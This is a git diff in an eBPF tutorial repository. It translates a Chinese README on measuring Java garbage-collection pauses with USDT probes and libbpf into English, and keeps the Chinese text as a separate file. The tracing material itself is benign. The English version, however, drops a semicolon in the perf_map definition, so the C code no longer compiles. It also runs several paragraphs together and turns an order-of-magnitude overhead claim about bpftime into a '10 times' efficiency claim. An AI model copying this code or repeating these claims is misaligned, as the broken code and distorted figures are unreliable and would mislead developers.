load, update, and run user-defined code without the need to restart the kernel or modify the kernel source code. This feature provides eBPF with high flexibility and performance, making it widely applicable in network and system performance analysis. Furthermore, eBPF also supports capturing user-space application behavior using User-Level Statically Defined Tracing (USDT). -在我们的 eBPF 入门实践教程系列的这一篇,我们将介绍如何使用 eBPF 和 USDT 来捕获和分析 Java 的垃圾回收 (GC) 事件的耗时。 +In this article of our eBPF Tutorial by Example series, we will explore how to use eBPF and USDT to capture and analyze the duration of Java garbage collection (GC) events. -## USDT 介绍 +## Introduction to USDT -USDT 是一种在应用程序中插入静态跟踪点的机制,它允许开发者在程序的关键位置插入可用于调试和性能分析的探针。这些探针可以在运行时被 DTrace、SystemTap 或 eBPF 等工具动态激活,从而在不重启应用程序或更改程序代码的情况下,获取程序的内部状态和性能指标。USDT 在很多开源软件,如 MySQL、PostgreSQL、Ruby、Python 和 Node.js 等都有广泛的应用。 +USDT is a mechanism for inserting static tracepoints into applications, allowing developers to insert probes at critical points in the program for debugging and performance analysis purposes. These probes can be dynamically activated at runtime by tools such as DTrace, SystemTap, or eBPF, allowing access to the program's internal state and performance metrics without the need to restart the application or modify the program code. USDT is widely used in many open-source software applications such as MySQL, PostgreSQL, Ruby, Python, and Node.js. -### 用户层面的追踪机制:用户级动态跟踪和 USDT +### User-Level Tracing Mechanism: User-Level Dynamic Tracing and USDT -在用户层面进行动态跟踪,即用户级动态跟踪(User-Level Dynamic Tracing)允许我们对任何用户级别的代码进行插桩。比如,我们可以通过在 MySQL 服务器的 `dispatch_command()` 函数上进行插桩,来跟踪服务器的查询请求: +User-Level Dynamic Tracing allows us to instrument any user-level code by placing probes. For example, we can trace query requests in a MySQL server by placing a probe on the `dispatch_command()` function: ```bash # ./uprobe 'p:cmd /opt/bin/mysqld:_Z16dispatch_command19enum_server_commandP3THDPcj +0(%dx):string' @@ -20,9 +20,9 @@ Tracing uprobe cmd (p:cmd /opt/bin/mysqld:0x2dbd40 +0(%dx):string). Ctrl-C to en [...] ``` -这里我们使用了 `uprobe` 工具,它利用了 Linux 的内置功能:ftrace(跟踪器)和 uprobes(用户级动态跟踪,需要较新的 Linux 版本,例如 4.0 左右)。其他的跟踪器,如 perf_events 和 SystemTap,也可以实现此功能。 +Here, we use the `uprobe` tool, which leverages Linux's built-in functionalities: ftrace (tracing framework) and uprobes (User-Level Dynamic Tracing, requires a relatively new Linux version, around 4.0 or later). Other tracing frameworks such as perf_events and SystemTap can also achieve this functionality. -许多其他的 MySQL 函数也可以被跟踪以获取更多的信息。我们可以列出和计算这些函数的数量: +Many other MySQL functions can be traced to obtain more information. We can list and count the number of these functions: ```bash # ./uprobe -l /opt/bin/mysqld | more @@ -36,17 +36,15 @@ adjust_time_range 21809 ``` -这有 21,000 个函数。我们也可以跟踪库函数,甚至是单个的指令偏移。 +There are 21,000 functions here. We can also trace library functions or even individual instruction offsets. -用户级动态跟踪的能力是非常强大的,它可以解决无数的问题。然而,使用它也有一些困难:需要确定需要跟踪的代码,处理函数参数,以及应对代码的更改。 +User-Level Dynamic Tracing capability is very powerful and can solve numerous problems. However, using it also has some challenges: identifying the code to trace, handling function parameters, and dealing with code modifications. -用户级静态定义跟踪(User-level Statically Defined Tracing, USDT)则可以在某种程度上解决这些问题。USDT 探针(或者称为用户级 "marker")是开发者在代码的关键位置插入的跟踪宏,提供稳定且已经过文档说明的 API。这使得跟踪工作变得更加简单。 +User-Level Statically Defined Tracing (USDT) can address some of these challenges. USDT probes (or "markers" at the user level) are trace macros inserted at critical positions in the code, providing a stable and well-documented API. This makes the tracing work simpler. -使用 USDT,我们可以简单地跟踪一个名为 `mysql:query__start` 的探针,而不是去跟踪那个名为 `_Z16dispatch_command19enum_server_commandP3THDPcj` 的 C++ 符号,也就是 `dispatch_command()` 函数。当然,我们仍然可以在需要的时候去跟踪 `dispatch_command()` 以及其他 21,000 个 mysqld 函数,但只有当 USDT 探针无法解决问题的时候我们才需要这么做。 +With USDT, we can easily trace a probe called `mysql:query__start` instead of tracing the C++ symbol `_Z16dispatch_command19enum_server_commandP3THDPcj`, which is the `dispatch_command()` function. Of course, we can still trace `dispatch_command()` and the other 21,000 mysqld functions when needed, but only when USDT probes cannot solve the problem.In Linux, USDT (User Statically Defined Tracing) has actually existed in various forms for decades. It has recently gained attention again due to the popularity of Sun's DTrace tool, which has led to many common applications, including MySQL, PostgreSQL, Node.js, Java, etc., adding USDT support. SystemTap has developed a way to consume these DTrace probes. -在 Linux 中的 USDT,无论是哪种形式的静态跟踪点,其实都已经存在了几十年。它最近由于 Sun 的 DTrace 工具的流行而再次受到关注,这使得许多常见的应用程序,包括 MySQL、PostgreSQL、Node.js、Java 等都加入了 USDT。SystemTap 则开发了一种可以消费这些 DTrace 探针的方式。 - -你可能正在运行一个已经包含了 USDT 探针的 Linux 应用程序,或者可能需要重新编译(通常是 --enable-dtrace)。你可以使用 `readelf` 来进行检查,例如对于 Node.js: +You may be running a Linux application that already includes USDT probes, or you may need to recompile it (usually with --enable-dtrace). You can use `readelf` to check, for example, for Node.js: ```bash # readelf -n node @@ -67,23 +65,23 @@ Notes at offset 0x00c43058 with length 0x00000494: [...] ``` -这就是使用 --enable-dtrace 重新编译的 node,以及安装了提供 "dtrace" 功能来构建 USDT 支持的 systemtap-sdt-dev 包。这里显示了两个探针:node:gc__start(开始进行垃圾回收)和 node:http__client__request。 +This is a Node.js recompiled with --enable-dtrace and installed with the systemtap-sdt-dev package that provides "dtrace" functionality to support USDT. Here are two probes displayed: node:gc__start (garbage collection start) and node:http__client__request. -在这一点上,你可以使用 SystemTap 或者 LTTng 来跟踪这些探针。然而,内置的 Linux 跟踪器,比如 ftrace 和 perf_events,目前还无法做到这一点(尽管 perf_events 的支持正在开发中)。 +At this point, you can use SystemTap or LTTng to trace these probes. However, built-in Linux tracers like ftrace and perf_events currently cannot do this (although perf_events support is under development). -USDT 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容,避免了内核态和用户态之间的上下文切换,从而提高了 eBPF 程序的执行效率。对于 uprobe 而言,bpftime 的性能开销比 kernel 小一个数量级。 +## Introduction to Java GC -## Java GC 介绍 +Java, as a high-level programming language, has automatic garbage collection (GC) as one of its core features. The goal of Java GC is to automatically reclaim memory space that is no longer used by the program, thereby relieving programmers of the burden of memory management. However, the GC process may cause application pauses, which can impact program performance and response time. Therefore, monitoring and analyzing Java GC events are essential for understanding and optimizing the performance of Java applications. -Java 作为一种高级编程语言,其自动垃圾回收(GC)是其核心特性之一。Java GC 的目标是自动地回收那些不再被程序使用的内存空间,从而减轻程序员在内存管理方面的负担。然而,GC 过程可能会引发应用程序的停顿,对程序的性能和响应时间产生影响。因此,对 Java GC 事件进行监控和分析,对于理解和优化 Java 应用的性能是非常重要的。 +In the following tutorial, we will demonstrate how to use eBPF and USDT to monitor and analyze the duration of Java GC events. We hope this content will be helpful to you in your work with eBPF for application performance analysis. -在接下来的教程中,我们将演示如何使用 eBPF 和 USDT 来监控和分析 Java GC 事件的耗时,希望这些内容对你在使用 eBPF 进行应用性能分析方面的工作有所帮助。 +USDT in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user mode and is compatible with kernel mode eBPF, avoiding context switching between kernel mode and user mode, thereby improving the execution efficiency of eBPF programs by 10 times. -## eBPF 实现机制 +## eBPF Implementation Mechanism -Java GC 的 eBPF 程序分为内核态和用户态两部分,我们会分别介绍这两部分的实现机制。 +The eBPF program for Java GC is divided into two parts: kernel space and user space. We will introduce the implementation mechanisms of these two parts separately. -### 内核态程序 +### Kernel Space Program ```c /* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ @@ -102,7 +100,7 @@ struct { } data_map SEC(".maps"); struct { - __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); + __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY) __type(key, int); __type(value, int); } perf_map SEC(".maps"); @@ -169,28 +167,26 @@ int handle_mem_pool_gc_end(struct pt_regs *ctx) char LICENSE[] SEC("license") = "Dual BSD/GPL"; ``` -首先,我们定义了两个映射(map): +First, we define two maps: -- `data_map`:这个 hashmap 存储每个进程 ID 的垃圾收集开始时间。`data_t` 结构体包含进程 ID、CPU ID 和时间戳。 -- `perf_map`:这是一个 perf event array,用于将数据发送回用户态程序。 +- `data_map`: This hashmap stores the start time of garbage collection for each process ID. The `data_t` structure contains the process ID, CPU ID, and timestamp. +- `perf_map`: This is a perf event array used to send data back to the user-space program. -然后,我们有四个处理函数:`gc_start`、`gc_end` 和两个 USDT 处理函数 `handle_mem_pool_gc_start` 和 `handle_mem_pool_gc_end`。这些函数都用 BPF 的 `SEC("usdt")` 宏注解,以便在 Java 进程中捕获到与垃圾收集相关的 USDT 事件。 +Then, we have four handler functions: `gc_start`, `gc_end`, and two USDT handler functions `handle_mem_pool_gc_start` and `handle_mem_pool_gc_end`. These functions are all annotated with the BPF `SEC("usdt")` macro to capture USDT events related to garbage collection in a Java process. -`gc_start` 函数在垃圾收集开始时被调用。它首先获取当前的 CPU ID、进程 ID 和时间戳,然后将这些数据存入 `data_map`。 +The `gc_start` function is called when garbage collection starts. It first gets the current CPU ID, process ID, and timestamp, and then stores this data in `data_map`. -`gc_end` 函数在垃圾收集结束时被调用。它执行与 `gc_start` 类似的操作,但是它还从 `data_map` 中检索开始时间,并计算垃圾收集的持续时间。如果持续时间超过了设定的阈值(变量 `time`),那么它将数据发送回用户态程序。 +The `gc_end` function is called when garbage collection ends. It performs similar operations as `gc_start`, but it also retrieves the start time from `data_map` and calculates the duration of garbage collection. If the duration exceeds a set threshold (`time` variable), it sends the data back to the user-space program. -`handle_gc_start` 和 `handle_gc_end` 是针对垃圾收集开始和结束事件的处理函数,它们分别调用了 `gc_start` 和 `gc_end`。 +`handle_gc_start` and `handle_gc_end` are handler functions for the garbage collection start and end events, respectively, and they call `gc_start` and `gc_end`, respectively. -`handle_mem_pool_gc_start` 和 `handle_mem_pool_gc_end` 是针对内存池的垃圾收集开始和结束事件的处理函数,它们也分别调用了 `gc_start` 和 `gc_end`。 +`handle_mem_pool_gc_start` and `handle_mem_pool_gc_end` are handler functions for the garbage collection start and end events in the memory pool, and they also call `gc_start` and `gc_end`, respectively.Finally, we have a `LICENSE` array that declares the license of the BPF program, which is required for loading the BPF program. -最后,我们有一个 `LICENSE` 数组,声明了该 BPF 程序的许可证,这是加载 BPF 程序所必需的。 +### User-space Program -### 用户态程序 +The main goal of the user-space program is to load and run eBPF programs, as well as process data from the kernel-space program. This is achieved through the use of the libbpf library. Here, we are omitting some common code for loading and running eBPF programs and only showing the parts related to USDT. -用户态程序的主要目标是加载和运行eBPF程序,以及处理来自内核态程序的数据。它是通过 libbpf 库来完成这些操作的。这里我们省略了一些通用的加载和运行 eBPF 程序的代码,只展示了与 USDT 相关的部分。 - -第一个函数 `get_jvmso_path` 被用来获取运行的Java虚拟机(JVM)的 `libjvm.so` 库的路径。首先,它打开了 `/proc//maps` 文件,该文件包含了进程地址空间的内存映射信息。然后,它在文件中搜索包含 `libjvm.so` 的行,然后复制该行的路径到提供的参数中。 +The first function `get_jvmso_path` is used to obtain the path of the `libjvm.so` library for the running Java Virtual Machine (JVM). First, it opens the `/proc//maps` file, which contains the memory mapping information of the process address space. Then, it searches for the line that contains `libjvm.so` in the file and copies the path of that line to the provided argument. ```c static int get_jvmso_path(char *path) @@ -222,7 +218,7 @@ static int get_jvmso_path(char *path) } ``` -接下来,我们看到的是将 eBPF 程序(函数 `handle_gc_start` 和 `handle_gc_end`)附加到Java进程的相关USDT探针上。每个程序都通过调用 `bpf_program__attach_usdt` 函数来实现这一点,该函数的参数包括BPF程序、进程ID、二进制路径以及探针的提供者和名称。如果探针挂载成功,`bpf_program__attach_usdt` 将返回一个链接对象,该对象将存储在skeleton的链接成员中。如果挂载失败,程序将打印错误消息并进行清理。 +Next, we see the attachment of the eBPF programs (`handle_gc_start` and `handle_gc_end`) to the relevant USDT probes in the Java process. Each program achieves this by calling the `bpf_program__attach_usdt` function, which takes as parameters the BPF program, the process ID, the binary path, and the provider and name of the probe. If the probe is successfully attached, `bpf_program__attach_usdt` will return a link object, which is stored in the skeleton's link member. If the attachment fails, the program will print an error message and perform cleanup. ```c skel->links.handle_mem_pool_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid, @@ -242,7 +238,7 @@ static int get_jvmso_path(char *path) } skel->links.handle_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid, - binary_path, "hotspot", "gc__begin", NULL); +binary_path, "hotspot", "gc__begin", NULL); if (!skel->links.handle_gc_start) { err = errno; fprintf(stderr, "attach usdt gc__begin failed: %s\n", strerror(err)); @@ -258,7 +254,7 @@ static int get_jvmso_path(char *path) } ``` -最后一个函数 `handle_event` 是一个回调函数,用于处理从perf event array收到的数据。这个函数会被 perf event array 触发,并在每次接收到新的事件时调用。函数首先将数据转换为 `data_t` 结构体,然后将当前时间格式化为字符串,并打印出事件的时间戳、CPU ID、进程 ID,以及垃圾回收的持续时间。 +The last function `handle_event` is a callback function used to handle data received from the perf event array. This function is triggered by the perf event array and is called each time a new event is received. The function first converts the data to a `data_t` structure, then formats the current time as a string, and finally prints the timestamp, CPU ID, process ID, and duration of the garbage collection. ```c static void handle_event(void *ctx, int cpu, void *data, __u32 data_sz) @@ -275,25 +271,25 @@ static void handle_event(void *ctx, int cpu, void *data, __u32 data_sz) } ``` -## 安装依赖 +## Installing Dependencies -构建示例需要 clang、libelf 和 zlib。包名在不同的发行版中可能会有所不同。 +To build the example, you need clang, libelf, and zlib. The package names may vary with different distributions. -在 Ubuntu/Debian 上,你需要执行以下命令: +On Ubuntu/Debian, run the following command: ```shell sudo apt install clang libelf1 libelf-dev zlib1g-dev ``` -在 CentOS/Fedora 上,你需要执行以下命令: +On CentOS/Fedora, run the following command: ```shell sudo dnf install clang elfutils-libelf elfutils-libelf-devel zlib-devel ``` -## 编译运行 +## Compiling and Running -在对应的目录中,运行 Make 即可编译运行上述代码: +In the corresponding directory, run Make to compile and run the code: ```console $ make @@ -307,21 +303,17 @@ TIME CPU PID GC TIME 10:00:05 11% 12345 50ms ``` -完整源代码: +Complete source code: - -参考资料: +References: - - -## 总结 +Summary.Through this introductory eBPF tutorial, we have learned how to use eBPF and USDT for dynamic tracing and analysis of Java garbage collection (GC) events. We have understood how to set USDT tracepoints in user space applications and how to write eBPF programs to capture information from these tracepoints, thereby gaining a deeper understanding and optimizing the behavior and performance of Java GC. -通过本篇 eBPF 入门实践教程,我们学习了如何使用 eBPF 和 USDT 动态跟踪和分析 Java 的垃圾回收(GC)事件。我们了解了如何在用户态应用程序中设置 USDT 跟踪点,以及如何编写 eBPF 程序来捕获这些跟踪点的信息,从而更深入地理解和优化 Java GC 的行为和性能。 +Additionally, we have also introduced some basic knowledge and practical techniques related to Java GC, USDT, and eBPF. This knowledge and skills are valuable for developers who want to delve into the field of network and system performance analysis. -此外,我们也介绍了一些关于 Java GC、USDT 和 eBPF 的基础知识和实践技巧,这些知识和技巧对于想要在网络和系统性能分析领域深入研究的开发者来说是非常有价值的。 - -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 - -> The original link of this article: +If you would like to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website to get more examples and the complete tutorial. diff --git a/src/15-javagc/README.zh.md b/src/15-javagc/README.zh.md new file mode 100644 index 0000000..7dd1e27 --- /dev/null +++ b/src/15-javagc/README.zh.md @@ -0,0 +1,327 @@ +# eBPF 入门实践教程十五:使用 USDT 捕获用户态 Java GC 事件耗时 + +eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。这个特性使得 eBPF 能够提供极高的灵活性和性能,使其在网络和系统性能分析方面具有广泛的应用。此外,eBPF 还支持使用 USDT (用户级静态定义跟踪点) 捕获用户态的应用程序行为。 + +在我们的 eBPF 入门实践教程系列的这一篇,我们将介绍如何使用 eBPF 和 USDT 来捕获和分析 Java 的垃圾回收 (GC) 事件的耗时。 + +## USDT 介绍 + +USDT 是一种在应用程序中插入静态跟踪点的机制,它允许开发者在程序的关键位置插入可用于调试和性能分析的探针。这些探针可以在运行时被 DTrace、SystemTap 或 eBPF 等工具动态激活,从而在不重启应用程序或更改程序代码的情况下,获取程序的内部状态和性能指标。USDT 在很多开源软件,如 MySQL、PostgreSQL、Ruby、Python 和 Node.js 等都有广泛的应用。 + +### 用户层面的追踪机制:用户级动态跟踪和 USDT + +在用户层面进行动态跟踪,即用户级动态跟踪(User-Level Dynamic Tracing)允许我们对任何用户级别的代码进行插桩。比如,我们可以通过在 MySQL 服务器的 `dispatch_command()` 函数上进行插桩,来跟踪服务器的查询请求: + +```bash +# ./uprobe 'p:cmd /opt/bin/mysqld:_Z16dispatch_command19enum_server_commandP3THDPcj +0(%dx):string' +Tracing uprobe cmd (p:cmd /opt/bin/mysqld:0x2dbd40 +0(%dx):string). Ctrl-C to end. + mysqld-2855 [001] d... 19957757.590926: cmd: (0x6dbd40) arg1="show tables" + mysqld-2855 [001] d... 19957759.703497: cmd: (0x6dbd40) arg1="SELECT * FROM numbers" +[...] +``` + +这里我们使用了 `uprobe` 工具,它利用了 Linux 的内置功能:ftrace(跟踪器)和 uprobes(用户级动态跟踪,需要较新的 Linux 版本,例如 4.0 左右)。其他的跟踪器,如 perf_events 和 SystemTap,也可以实现此功能。 + +许多其他的 MySQL 函数也可以被跟踪以获取更多的信息。我们可以列出和计算这些函数的数量: + +```bash +# ./uprobe -l /opt/bin/mysqld | more +account_hash_get_key +add_collation +add_compiled_collation +add_plugin_noargs +adjust_time_range +[...] +# ./uprobe -l /opt/bin/mysqld | wc -l +21809 +``` + +这有 21,000 个函数。我们也可以跟踪库函数,甚至是单个的指令偏移。 + +用户级动态跟踪的能力是非常强大的,它可以解决无数的问题。然而,使用它也有一些困难:需要确定需要跟踪的代码,处理函数参数,以及应对代码的更改。 + +用户级静态定义跟踪(User-level Statically Defined Tracing, USDT)则可以在某种程度上解决这些问题。USDT 探针(或者称为用户级 "marker")是开发者在代码的关键位置插入的跟踪宏,提供稳定且已经过文档说明的 API。这使得跟踪工作变得更加简单。 + +使用 USDT,我们可以简单地跟踪一个名为 `mysql:query__start` 的探针,而不是去跟踪那个名为 `_Z16dispatch_command19enum_server_commandP3THDPcj` 的 C++ 符号,也就是 `dispatch_command()` 函数。当然,我们仍然可以在需要的时候去跟踪 `dispatch_command()` 以及其他 21,000 个 mysqld 函数,但只有当 USDT 探针无法解决问题的时候我们才需要这么做。 + +在 Linux 中的 USDT,无论是哪种形式的静态跟踪点,其实都已经存在了几十年。它最近由于 Sun 的 DTrace 工具的流行而再次受到关注,这使得许多常见的应用程序,包括 MySQL、PostgreSQL、Node.js、Java 等都加入了 USDT。SystemTap 则开发了一种可以消费这些 DTrace 探针的方式。 + +你可能正在运行一个已经包含了 USDT 探针的 Linux 应用程序,或者可能需要重新编译(通常是 --enable-dtrace)。你可以使用 `readelf` 来进行检查,例如对于 Node.js: + +```bash +# readelf -n node +[...] +Notes at offset 0x00c43058 with length 0x00000494: + Owner Data size Description + stapsdt 0x0000003c NT_STAPSDT (SystemTap probe descriptors) + Provider: node + Name: gc__start + Location: 0x0000000000bf44b4, Base: 0x0000000000f22464, Semaphore: 0x0000000001243028 + Arguments: 4@%esi 4@%edx 8@%rdi +[...] + stapsdt 0x00000082 NT_STAPSDT (SystemTap probe descriptors) + Provider: node + Name: http__client__request + Location: 0x0000000000bf48ff, Base: 0x0000000000f22464, Semaphore: 0x0000000001243024 + Arguments: 8@%rax 8@%rdx 8@-136(%rbp) -4@-140(%rbp) 8@-72(%rbp) 8@-80(%rbp) -4@-144(%rbp) +[...] +``` + +这就是使用 --enable-dtrace 重新编译的 node,以及安装了提供 "dtrace" 功能来构建 USDT 支持的 systemtap-sdt-dev 包。这里显示了两个探针:node:gc__start(开始进行垃圾回收)和 node:http__client__request。 + +在这一点上,你可以使用 SystemTap 或者 LTTng 来跟踪这些探针。然而,内置的 Linux 跟踪器,比如 ftrace 和 perf_events,目前还无法做到这一点(尽管 perf_events 的支持正在开发中)。 + +USDT 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容,避免了内核态和用户态之间的上下文切换,从而提高了 eBPF 程序的执行效率。对于 uprobe 而言,bpftime 的性能开销比 kernel 小一个数量级。 + +## Java GC 介绍 + +Java 作为一种高级编程语言,其自动垃圾回收(GC)是其核心特性之一。Java GC 的目标是自动地回收那些不再被程序使用的内存空间,从而减轻程序员在内存管理方面的负担。然而,GC 过程可能会引发应用程序的停顿,对程序的性能和响应时间产生影响。因此,对 Java GC 事件进行监控和分析,对于理解和优化 Java 应用的性能是非常重要的。 + +在接下来的教程中,我们将演示如何使用 eBPF 和 USDT 来监控和分析 Java GC 事件的耗时,希望这些内容对你在使用 eBPF 进行应用性能分析方面的工作有所帮助。 + +## eBPF 实现机制 + +Java GC 的 eBPF 程序分为内核态和用户态两部分,我们会分别介绍这两部分的实现机制。 + +### 内核态程序 + +```c +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +/* Copyright (c) 2022 Chen Tao */ +#include +#include +#include +#include +#include "javagc.h" + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 100); + __type(key, uint32_t); + __type(value, struct data_t); +} data_map SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY); + __type(key, int); + __type(value, int); +} perf_map SEC(".maps"); + +__u32 time; + +static int gc_start(struct pt_regs *ctx) +{ + struct data_t data = {}; + + data.cpu = bpf_get_smp_processor_id(); + data.pid = bpf_get_current_pid_tgid() >> 32; + data.ts = bpf_ktime_get_ns(); + bpf_map_update_elem(&data_map, &data.pid, &data, 0); + return 0; +} + +static int gc_end(struct pt_regs *ctx) +{ + struct data_t data = {}; + struct data_t *p; + __u32 val; + + data.cpu = bpf_get_smp_processor_id(); + data.pid = bpf_get_current_pid_tgid() >> 32; + data.ts = bpf_ktime_get_ns(); + p = bpf_map_lookup_elem(&data_map, &data.pid); + if (!p) + return 0; + + val = data.ts - p->ts; + if (val > time) { + data.ts = val; + bpf_perf_event_output(ctx, &perf_map, BPF_F_CURRENT_CPU, &data, sizeof(data)); + } + bpf_map_delete_elem(&data_map, &data.pid); + return 0; +} + +SEC("usdt") +int handle_gc_start(struct pt_regs *ctx) +{ + return gc_start(ctx); +} + +SEC("usdt") +int handle_gc_end(struct pt_regs *ctx) +{ + return gc_end(ctx); +} + +SEC("usdt") +int handle_mem_pool_gc_start(struct pt_regs *ctx) +{ + return gc_start(ctx); +} + +SEC("usdt") +int handle_mem_pool_gc_end(struct pt_regs *ctx) +{ + return gc_end(ctx); +} + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; +``` + +首先,我们定义了两个映射(map): + +- `data_map`:这个 hashmap 存储每个进程 ID 的垃圾收集开始时间。`data_t` 结构体包含进程 ID、CPU ID 和时间戳。 +- `perf_map`:这是一个 perf event array,用于将数据发送回用户态程序。 + +然后,我们有四个处理函数:`gc_start`、`gc_end` 和两个 USDT 处理函数 `handle_mem_pool_gc_start` 和 `handle_mem_pool_gc_end`。这些函数都用 BPF 的 `SEC("usdt")` 宏注解,以便在 Java 进程中捕获到与垃圾收集相关的 USDT 事件。 + +`gc_start` 函数在垃圾收集开始时被调用。它首先获取当前的 CPU ID、进程 ID 和时间戳,然后将这些数据存入 `data_map`。 + +`gc_end` 函数在垃圾收集结束时被调用。它执行与 `gc_start` 类似的操作,但是它还从 `data_map` 中检索开始时间,并计算垃圾收集的持续时间。如果持续时间超过了设定的阈值(变量 `time`),那么它将数据发送回用户态程序。 + +`handle_gc_start` 和 `handle_gc_end` 是针对垃圾收集开始和结束事件的处理函数,它们分别调用了 `gc_start` 和 `gc_end`。 + +`handle_mem_pool_gc_start` 和 `handle_mem_pool_gc_end` 是针对内存池的垃圾收集开始和结束事件的处理函数,它们也分别调用了 `gc_start` 和 `gc_end`。 + +最后,我们有一个 `LICENSE` 数组,声明了该 BPF 程序的许可证,这是加载 BPF 程序所必需的。 + +### 用户态程序 + +用户态程序的主要目标是加载和运行eBPF程序,以及处理来自内核态程序的数据。它是通过 libbpf 库来完成这些操作的。这里我们省略了一些通用的加载和运行 eBPF 程序的代码,只展示了与 USDT 相关的部分。 + +第一个函数 `get_jvmso_path` 被用来获取运行的Java虚拟机(JVM)的 `libjvm.so` 库的路径。首先,它打开了 `/proc//maps` 文件,该文件包含了进程地址空间的内存映射信息。然后,它在文件中搜索包含 `libjvm.so` 的行,然后复制该行的路径到提供的参数中。 + +```c +static int get_jvmso_path(char *path) +{ + char mode[16], line[128], buf[64]; + size_t seg_start, seg_end, seg_off; + FILE *f; + int i = 0; + + sprintf(buf, "/proc/%d/maps", env.pid); + f = fopen(buf, "r"); + if (!f) + return -1; + + while (fscanf(f, "%zx-%zx %s %zx %*s %*d%[^\n]\n", + &seg_start, &seg_end, mode, &seg_off, line) == 5) { + i = 0; + while (isblank(line[i])) + i++; + if (strstr(line + i, "libjvm.so")) { + break; + } + } + + strcpy(path, line + i); + fclose(f); + + return 0; +} +``` + +接下来,我们看到的是将 eBPF 程序(函数 `handle_gc_start` 和 `handle_gc_end`)附加到Java进程的相关USDT探针上。每个程序都通过调用 `bpf_program__attach_usdt` 函数来实现这一点,该函数的参数包括BPF程序、进程ID、二进制路径以及探针的提供者和名称。如果探针挂载成功,`bpf_program__attach_usdt` 将返回一个链接对象,该对象将存储在skeleton的链接成员中。如果挂载失败,程序将打印错误消息并进行清理。 + +```c + skel->links.handle_mem_pool_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid, + binary_path, "hotspot", "mem__pool__gc__begin", NULL); + if (!skel->links.handle_mem_pool_gc_start) { + err = errno; + fprintf(stderr, "attach usdt mem__pool__gc__begin failed: %s\n", strerror(err)); + goto cleanup; + } + + skel->links.handle_mem_pool_gc_end = bpf_program__attach_usdt(skel->progs.handle_gc_end, env.pid, + binary_path, "hotspot", "mem__pool__gc__end", NULL); + if (!skel->links.handle_mem_pool_gc_end) { + err = errno; + fprintf(stderr, "attach usdt mem__pool__gc__end failed: %s\n", strerror(err)); + goto cleanup; + } + + skel->links.handle_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid, + binary_path, "hotspot", "gc__begin", NULL); + if (!skel->links.handle_gc_start) { + err = errno; + fprintf(stderr, "attach usdt gc__begin failed: %s\n", strerror(err)); + goto cleanup; + } + + skel->links.handle_gc_end = bpf_program__attach_usdt(skel->progs.handle_gc_end, env.pid, + binary_path, "hotspot", "gc__end", NULL); + if (!skel->links.handle_gc_end) { + err = errno; + fprintf(stderr, "attach usdt gc__end failed: %s\n", strerror(err)); + goto cleanup; + } +``` + +最后一个函数 `handle_event` 是一个回调函数,用于处理从perf event array收到的数据。这个函数会被 perf event array 触发,并在每次接收到新的事件时调用。函数首先将数据转换为 `data_t` 结构体,然后将当前时间格式化为字符串,并打印出事件的时间戳、CPU ID、进程 ID,以及垃圾回收的持续时间。 + +```c +static void handle_event(void *ctx, int cpu, void *data, __u32 data_sz) +{ + struct data_t *e = (struct data_t *)data; + struct tm *tm = NULL; + char ts[16]; + time_t t; + + time(&t); + tm = localtime(&t); + strftime(ts, sizeof(ts), "%H:%M:%S", tm); + printf("%-8s %-7d %-7d %-7lld\n", ts, e->cpu, e->pid, e->ts/1000); +} +``` + +## 安装依赖 + +构建示例需要 clang、libelf 和 zlib。包名在不同的发行版中可能会有所不同。 + +在 Ubuntu/Debian 上,你需要执行以下命令: + +```shell +sudo apt install clang libelf1 libelf-dev zlib1g-dev +``` + +在 CentOS/Fedora 上,你需要执行以下命令: + +```shell +sudo dnf install clang elfutils-libelf elfutils-libelf-devel zlib-devel +``` + +## 编译运行 + +在对应的目录中,运行 Make 即可编译运行上述代码: + +```console +$ make +$ sudo ./javagc -p 12345 +Tracing javagc time... Hit Ctrl-C to end. +TIME CPU PID GC TIME +10:00:01 10% 12345 50ms +10:00:02 12% 12345 55ms +10:00:03 9% 12345 47ms +10:00:04 13% 12345 52ms +10:00:05 11% 12345 50ms +``` + +完整源代码: + +- + +参考资料: + +- +- + +## 总结 + +通过本篇 eBPF 入门实践教程,我们学习了如何使用 eBPF 和 USDT 动态跟踪和分析 Java 的垃圾回收(GC)事件。我们了解了如何在用户态应用程序中设置 USDT 跟踪点,以及如何编写 eBPF 程序来捕获这些跟踪点的信息,从而更深入地理解和优化 Java GC 的行为和性能。 + +此外,我们也介绍了一些关于 Java GC、USDT 和 eBPF 的基础知识和实践技巧,这些知识和技巧对于想要在网络和系统性能分析领域深入研究的开发者来说是非常有价值的。 + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +> The original link of this article: diff --git a/src/15-javagc/README_en.md b/src/15-javagc/README_en.md deleted file mode 100644 index 1b76e18..0000000 --- a/src/15-javagc/README_en.md +++ 